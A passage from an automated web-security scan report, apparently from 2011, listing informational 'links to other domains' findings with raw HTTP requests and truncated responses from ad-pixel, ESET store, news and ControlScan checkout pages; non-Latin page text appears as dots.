Set-Cookie: scg=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: ppd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: afl=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 14:41:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4418

<!-- campaign #1437 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...
<!-- matched campaign #10641 is eligible -->
<img width=1 height=1 border=0 src="http://ad.trafficmp.com/a/bpix?adv=652&id=1005&r=">
<!-- "Net Suite" c/o "FetchBack", segment: 'Net Suite Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=6551&partnerID=91&clientID=1838&key=segment&returnType=js"></script>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
</noscript>
<!-- End ad tag -->
<img src="http://pixel.rubiconproject.com/tap.php?v=2939|1" border="0" width="1" height="1">
<!-- "NetSuite AU" c/o "FetchBack", segment: 'NetSuiteAU Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment" width="1" height="1" />
</noscript>
...[SNIP]...
<!-- "NetSuite Singapore" c/o "FetchBack", segment: 'NetSuite Sing Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment" width="1" height="1" />
</noscript>
<!-- End of pixel tag -->
<img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=798&s=$t&l=1&t=i&e=1" width="1" height="1" border="0" >
<!-- "NetSuite UK" c/o "FetchBack", segment: 'NetSuite UK Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13896&partnerID=91&clientID=2694&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13896&partnerID=91&clientID=2694&key=segment" width="1" height="1" />
</noscript>
<!-- End of pixel tag -->
<img src="http://ad.adtegrity.net/pixel?id=494024&t=2" width="1" height="1" />
<!-- "NetSuite HonKong" c/o "FetchBack", segment: 'NetSuite HonKong Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13902&partnerID=91&clientID=2696&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13902&partnerID=91&clientID=2696&key=segment" width="1" height="1" />
</noscript>
...[SNIP]...
<!-- Advertiser 'OpenX Limited', Include user in segment 'Fetchback_148' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ad.yieldmanager.com/pixel?id=478454&t=2" width="1" height="1" />
<!-- End of segment tag -->
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=1801246;dcnet=4591;boom=23534;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
</noscript>
...[SNIP]...
<!-- Advertiser 'FetchBack (m)', Include user in segment 'retargeting - 242' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ad.bannerconnect.net/pixel?id=495608&t=2" width="1" height="1" />
<!-- End of segment tag -->
<img src="http://idcs.interclick.com/Segment.aspx?sid=ab470e57-8d67-4a28-b9b1-aaf3331f5214"/>

22.42. http://shopping.netsuite.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /s.nl?c=438708&sc=3&whence=&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; NLPromocode=438708_; promocode=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:59:58 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 677005915:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54139


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
00&amp;bgbutton=F2F4F6&amp;bgrequiredfld=ffffff&amp;font=Arial%2CHelvetica%2Csans-serif&amp;size_site_content=10pt&amp;size_site_title=10pt&amp;size=1.0&amp;nlinputstyles=T&amp;NS_VER=2011.1.0&amp;3'>
<script type="text/javascript" src="https://secure.eset.com/us/store/geoIpRedirect"></script>
...[SNIP]...
<div id="header_logo"><a href="http://www.eset.com/us"><img src="/c.438708/images/eset_logo.png" alt="ESET LLC">
...[SNIP]...
<li><a href="http://www.eset.com/us/partners/worldwide-partners" class="header_partners">United States</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/company">About ESET</a>
...[SNIP]...
<li class="first_main_nav_item"><a href="http://www.eset.com/us/home">For Home</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/business/products">For Business</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/store" class="selected">Store</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/download">Download</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/support">Support</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/partners">Partners</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/rss"><span class="rss">
...[SNIP]...
<li><a href="http://www.eset.com/us/company/contact">Contact Us</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/company/privacy-policy">Privacy</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/company/legal-notices">Legal Notices</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/sitemap">Sitemap</a>
...[SNIP]...
<div class="social-icons">
<a href="http://www.facebook.com/esetusa" onclick="window.open(this.href);return false;"><img src="/c.438708/images/social/facebook_icon.gif" alt="Visit ESET on Facebook"></a>
<a href="http://www.twitter.com/eset" onclick="window.open(this.href);return false;"><img src="/c.438708/images/social/twitter_icon.gif" alt="Follow ESET on Twitter"></a>
<a href="http://www.youtube.com/user/esetusa" onclick="window.open(this.href);return false;"><img src="/c.438708/images/social/youtube_icon.gif" alt="ESET YouTube Channel"></a>
<a href="http://www.eset.com/us/rss" onclick="window.open(this.href);return false;"><img src="/c.438708/images/social/rss_icon.gif" alt="Subscribe to ESET RSS feeds">
...[SNIP]...
<!-- SiteCatalyst code version: H.21.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

<script type="text/javascript" src="https://secure.eset.com/us/scripts/lib/s_code3.js"></script>
...[SNIP]...
<div><img src="https://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt=""></div>
...[SNIP]...

22.43. http://storage.trafic.ro/js/trafic.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://storage.trafic.ro
Path:   /js/trafic.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /js/trafic.js?tk=5090212859213352&t_rid=romarketgidcom HTTP/1.1
Host: storage.trafic.ro
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafic_ranking=6c7f4ecfdd8l1dc980fda3f00c3621d0

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:39:00 GMT
Server: Apache
Content-type: application/x-javascript
Expires: Thu, 11 Jan 1973 16:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:39:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="ALL IND DSP COR ADM CONo CUR IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Connection: close
Content-Length: 7673

function trfc$tfCxOy (){$tfCxPy = 0;$tfCyPy='';$tfCzPy=window;$tfCzPz=$tfCzPy.location;$tfCzPA=Math;$tfCzQA=String;$tfCzQB=$tfCzQA.fromCharCode;if($tfCzPz.protocol=='file:')return;$tfCzRB=navigator;$t
...[SNIP]...
ru site-urile romanesti';$tfQSaN.appendChild($tfPSaM);}$tfRSaN=document.getElementById("trfc_trafic_script");$tfRSaN.parentNode.insertBefore(88>1?$tfQSaN:$tfPSaM,$tfRSaN);} else {document.write((88>1?'<a href="http://www.trafic.ro/?rid='+t_rid+'" target=_blank>':'')+'<img src="'+$tfNS9M+'"'+' width="88" height="31"'+(88>
...[SNIP]...

22.44. http://tengrinews.kz/static/js/twitter.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tengrinews.kz
Path:   /static/js/twitter.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /static/js/twitter.js?1303741246 HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
Referer: http://tengrinews.kz/tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2s711rqep5c965kp1duse9cev3; sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229d0d0366c112938578e0493b8d3e9f0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303741246%22%3B%7Dff90da2a04be034fcd1d0a9e7c69a191

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:36:51 GMT
Content-Type: application/javascript
Connection: keep-alive
Last-Modified: Thu, 21 Apr 2011 04:41:57 GMT
ETag: "be0c2-a23-4a1665c78cf40"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2595

/* womtec.ru */

var tweetUsers = ['tengrinewskz','KarimMassimov', 'MedvedevRussia', 'BarackObama','AZhumagaliev', 'KremlinRussia'];
var buildString = "";

$(document).ready(function(){

   $('#t
...[SNIP]...
<div class="user"><a href="http://twitter.com/'+this.from_user+'" target="_blank">'+this.from_user+'</a>
...[SNIP]...
</a>');
   str = str.replace(/([^\w])\@([\w\-]+)/gm,'$1@<a href="http://twitter.com/$2" target="_blank">$2</a>');
   str = str.replace(/([^\w])\#([\w\-]+)/gm,'$1<a href="http://twitter.com/search?q=%23$2" target="_blank">#$2</a>
...[SNIP]...

22.45. http://tengrinews.kz/tag/891/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tengrinews.kz
Path:   /tag/891/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:34:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.3-2
Set-Cookie: PHPSESSID=2kh13g87ng9vfofjh75vcvpsb3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22992c6a53539ed93969b86244758fda88%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303742049%22%3B%7D214a8e57fbabe8f7012a7d490d65daa7; expires=Thu, 28-Apr-2011 14:34:09 GMT; path=/
Vary: Accept-Encoding
Content-Length: 32979

<!DOCTYPE html>
<html>
<head>
<title>Tengrinews.kz : .............. .................... .... ..............</title>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta
...[SNIP]...
<div class="lang">
                                                   <a href="http://m.tengrinews.kz/" class="mobile_version" title=".................. ............" target="_self"><img src="/static/i/m.gif" />
...[SNIP]...
</font>
                           <a href="http://en.tengrinews.kz/" title="English" target="_self">EN</a>
...[SNIP]...
<div class="radioFlash">
               <a href="http://tengrifm.kz" class="showTengriFm" target="_blank">
                   <img src="/static/images/radioFlash.png" alt="" class="png" />
...[SNIP]...
<li><a href="https://twitter.com/tengrinewskz" title="twitter" class="tw">twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/profile.php?id=100001852320591&v=wall" title="facebook" class="fb">facebook</a>
...[SNIP]...
</script>
       <a href="http://orphus.ru" id="orphus" target="_blank"><img alt=".............. Orphus" src="/static/js/orphus.gif" border="0" />
...[SNIP]...
<div class="creator"><a href="http://notamedia.ru/">........ ............ .. ................ Notamedia</a>
...[SNIP]...
<noscript>
<a href='http://zero.kz/?u=40613' target='_blank'>
<img src='http://zero.kz/c.php?u=40613' border='0px' width='88'
height='31' alt='CountZero' />
</a>
...[SNIP]...
<!-- begin of Top100 code -->
<script id="top100Counter" type="text/javascript" src="http://counter.rambler.ru/top100.jcn?2378577"></script>
<noscript>
<a href="http://top100.rambler.ru/navi/2378577/">
<img src="http://counter.rambler.ru/top100.cnt?2378577" alt="Rambler's Top100" border="0" />
</a>
...[SNIP]...
<!-- Yandex.Metrika -->
   <script src="http://mc.yandex.ru/metrika/watch.js" type="text/javascript"></script>
...[SNIP]...
<div style="position:absolute"><img src="http://mc.yandex.ru/watch/1838272" alt="" /></div>
...[SNIP]...

22.46. http://webalta.ru/news.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webalta.ru
Path:   /news.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news.html?14857 HTTP/1.1
Host: webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; MG_id=7269; MG_type=news; MG_1001=1; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:30:08 GMT
Server: Apache/1.3.42 (Unix)
Last-Modified: Mon, 25 Apr 2011 14:18:12 GMT
ETag: "5dba7-6471-4db582a4"
Accept-Ranges: bytes
Content-Length: 25713
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>.. .............
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   
   <link rel="stylesheet" type="text/css" href="http://img.webalta.ru/public/css/style.css">
   <!--[if IE]>
...[SNIP]...
<![endif]-->
   
   <script language="JavaScript" type="text/javascript" src="http://img.webalta.ru/public/js/webalta.js"></script>
...[SNIP]...
</b>&nbsp;&nbsp;<a href="http://auto.webalta.ru" target="_blank">........</a>&nbsp;&nbsp;<a href="http://kino.webalta.ru" target="_blank">........</a><a href="http://pogoda.webalta.ru" target="_blank">............</a>&nbsp;&nbsp;<a href="http://games.webalta.ru" target="_blank">........</a>
...[SNIP]...
<div class="floatR"><a href="http://my.webalta.ru/" target="_blank">...... ................</a>
...[SNIP]...
<a href="/"><img src="http://img.webalta.ru/public/images/logo200x80.png" width="200" height="80"></a>
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/10345451560/' target='_blank'><img id='newsID0_img' src="http://img.webalta.ru/newsImg/news_0.jpg?55718" width="100" height="100"></a>
                        <a id='newsID0_title' class="news-title" href='http://justanews.ru/general/10345451560/' target='_blank'>.. ........................ ................ .......... .................. ....................</a>
...[SNIP]...
<br>
                       <a id='newsID0_text' href="http://justanews.ru/general/10345451560/" target='_blank'>.. .............. .......... .. .......... ...... ........ .................... ........ .... ............ .................. - ................ .. 1493 ........ .. ................ ...................
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/11478849322/' target='_blank'><img id='newsID1_img' src="http://img.webalta.ru/newsImg/news_1.jpg?55718" width="100" height="100"></a>
                        <a id='newsID1_title' class="news-title" href='http://justanews.ru/general/11478849322/' target='_blank'>.... ........ .................. .......... ....................</a>
...[SNIP]...
<br>
                       <a id='newsID1_text' href="http://justanews.ru/general/11478849322/" target='_blank'>.. ........................ ................ .......... .................. .......... .........., .................... ................ Stars. .... ........ .... .............. .... ...................
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/8272959774/' target='_blank'><img id='newsID2_img' src="http://img.webalta.ru/newsImg/news_2.jpg?55718" width="100" height="100"></a>
                        <a id='newsID2_title' class="news-title" href='http://justanews.ru/general/8272959774/' target='_blank'>SpaceX .................. .............. .... ........ .......... 10-20 ......</a>
...[SNIP]...
<br>
                       <a id='newsID2_text' href="http://justanews.ru/general/8272959774/" target='_blank'>SpaceX ............................ ................ ................ .... ........ .. .................. 10-20 ....... .... ........ ............ ........................ ................ ........ ...
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/8111385468/' target='_blank'><img id='newsID3_img' src="http://img.webalta.ru/newsImg/news_3.jpg?55718" width="100" height="100"></a>
                        <a id='newsID3_title' class="news-title" href='http://justanews.ru/general/8111385468/' target='_blank'>.... .............. .............. .................. .............. .................................... ..........</a>
...[SNIP]...
<br>
                       <a id='newsID3_text' href="http://justanews.ru/general/8111385468/" target='_blank'>.. .................... ........................, ...................... ........................ ...... .. ......, .. ...................... ........ .................. ............ .............. ..
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/8279317407/' target='_blank'><img id='newsID5_img' src="http://img.webalta.ru/newsImg/news_5.jpg?55718" width="100" height="100"></a>
                        <a id='newsID5_title' class="news-title" href='http://justanews.ru/general/8279317407/' target='_blank'>............ .................. .... ..............</a>
...[SNIP]...
<br>
                       <a id='newsID5_text' href="http://justanews.ru/general/8279317407/" target='_blank'>.. .................... ................ .................. ............. .. ........................ .............., .................. .. ........................ .......... ...... .............. ...
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/9412017149/' target='_blank'><img id='newsID6_img' src="http://img.webalta.ru/newsImg/news_6.jpg?55718" width="100" height="100"></a>
                        <a id='newsID6_title' class="news-title" href='http://justanews.ru/general/9412017149/' target='_blank'>.......... ............ ...................... .............. ............ .. ............ .... ............ ....-2011</a>
...[SNIP]...
<br>
                       <a id='newsID6_text' href="http://justanews.ru/general/9412017149/" target='_blank'>.............. ............ .............. ............ .... ............ ................ .......... .................... .............., .............. .......... ........................ ...........
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/9144492183/' target='_blank'><img id='newsID7_img' src="http://img.webalta.ru/newsImg/news_7.jpg?55718" width="100" height="100"></a>
                        <a id='newsID7_title' class="news-title" href='http://justanews.ru/general/9144492183/' target='_blank'>............ .............. .......................... .. .............. ............</a>
...[SNIP]...
<br>
                       <a id='newsID7_text' href="http://justanews.ru/general/9144492183/" target='_blank'>.................... .......... ............................ .............. ...... ............ .............. .......... ...... .......... .................. .............. ............. .... ........
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/10457898583/' target='_blank'><img id='newsID8_img' src="http://img.webalta.ru/newsImg/news_8.jpg?55718" width="100" height="100"></a>
                        <a id='newsID8_title' class="news-title" href='http://justanews.ru/general/10457898583/' target='_blank'>.................. .................. .. ........ ....-.... .......... ......S....</a>
...[SNIP]...
<br>
                       <a id='newsID8_text' href="http://justanews.ru/general/10457898583/" target='_blank'>.................................. ................ Gala Records (................. ..............) ............ ...... .. ...... .................. .... ............ ...................... ...........
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/11425643234/' target='_blank'><img id='newsID9_img' src="http://img.webalta.ru/newsImg/news_9.jpg?55718" width="100" height="100"></a>
                        <a id='newsID9_title' class="news-title" href='http://justanews.ru/general/11425643234/' target='_blank'>.............. ...... ........ 12 ...... .... ................ ..................</a>
...[SNIP]...
<br>
                       <a id='newsID9_text' href="http://justanews.ru/general/11425643234/" target='_blank'>.................... ................ .............. ...... .................... .......................... ...... .............. .................... .. 12 .......... .............. .... .............
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/9193279130/' target='_blank'><img id='newsID10_img' src="http://img.webalta.ru/newsImg/news_10.jpg?55718" width="100" height="100"></a>
                        <a id='newsID10_title' class="news-title" href='http://justanews.ru/general/9193279130/' target='_blank'>............ ...................... .... ................</a>
...[SNIP]...
<br>
                       <a id='newsID10_text' href="http://justanews.ru/general/9193279130/" target='_blank'>.............................. ...... ................ ...................... .......................... .................., ........ .... ................ ........ ...... ........................ .. .
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/12132715902/' target='_blank'><img id='newsID11_img' src="http://img.webalta.ru/newsImg/news_11.jpg?55718" width="100" height="100"></a>
                        <a id='newsID11_title' class="news-title" href='http://justanews.ru/general/12132715902/' target='_blank'>Apple ............ ............ .............. ............ ............ ............ ..........</a>
...[SNIP]...
<br>
                       <a id='newsID11_text' href="http://justanews.ru/general/12132715902/" target='_blank'>............ .......... 15-.... ............ ........................ .......... ........ .................. .. .......... .......................... ................ ................ Apple, ..........
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/9877594234/' target='_blank'><img id='newsID12_img' src="http://img.webalta.ru/newsImg/news_12.jpg?55718" width="100" height="100"></a>
                        <a id='newsID12_title' class="news-title" href='http://justanews.ru/general/9877594234/' target='_blank'>................ .................. .. .......... ............ .......... ............................ ..........</a>
...[SNIP]...
<br>
                       <a id='newsID12_text' href="http://justanews.ru/general/9877594234/" target='_blank'>.................. ............ .............. ................ .... ................, ...... .......... .............................. .......... .............. .......... ...................... .. ..
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/8185753558/' target='_blank'><img id='newsID13_img' src="http://img.webalta.ru/newsImg/news_13.jpg?55718" width="100" height="100"></a>
                        <a id='newsID13_title' class="news-title" href='http://justanews.ru/general/8185753558/' target='_blank'>................ ........ ................ .............. .............. ............</a>
...[SNIP]...
<br>
                       <a id='newsID13_text' href="http://justanews.ru/general/8185753558/" target='_blank'>.................... ................ LoveFilm, .................................... .... .............. .............. .. ................, .............. .......... .. ................, .......... ..
...[SNIP]...
<!-- Yandex.Metrika -->
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript"></script>
...[SNIP]...
<div style="position:absolute"><img src="//mc.yandex.ru/watch/57617?cnt-class=1" alt="" /></div>
...[SNIP]...

22.47. https://www.controlscan.com/checkout_invalid.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /checkout_invalid.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /checkout_invalid.php?pid=&reason=Card%20Number%20was%20not%20between%2013%20and%2016%20digits HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/checkout.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:56:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN LIVECHAT track tag. See also www.livechatinc.com -->
<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&amp;groups=0" type="text/javascript"></script>
...[SNIP]...
<!-- Verisign Seal-->
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&amp;size=M&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<!-- VTRENZ Tracking-->
<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
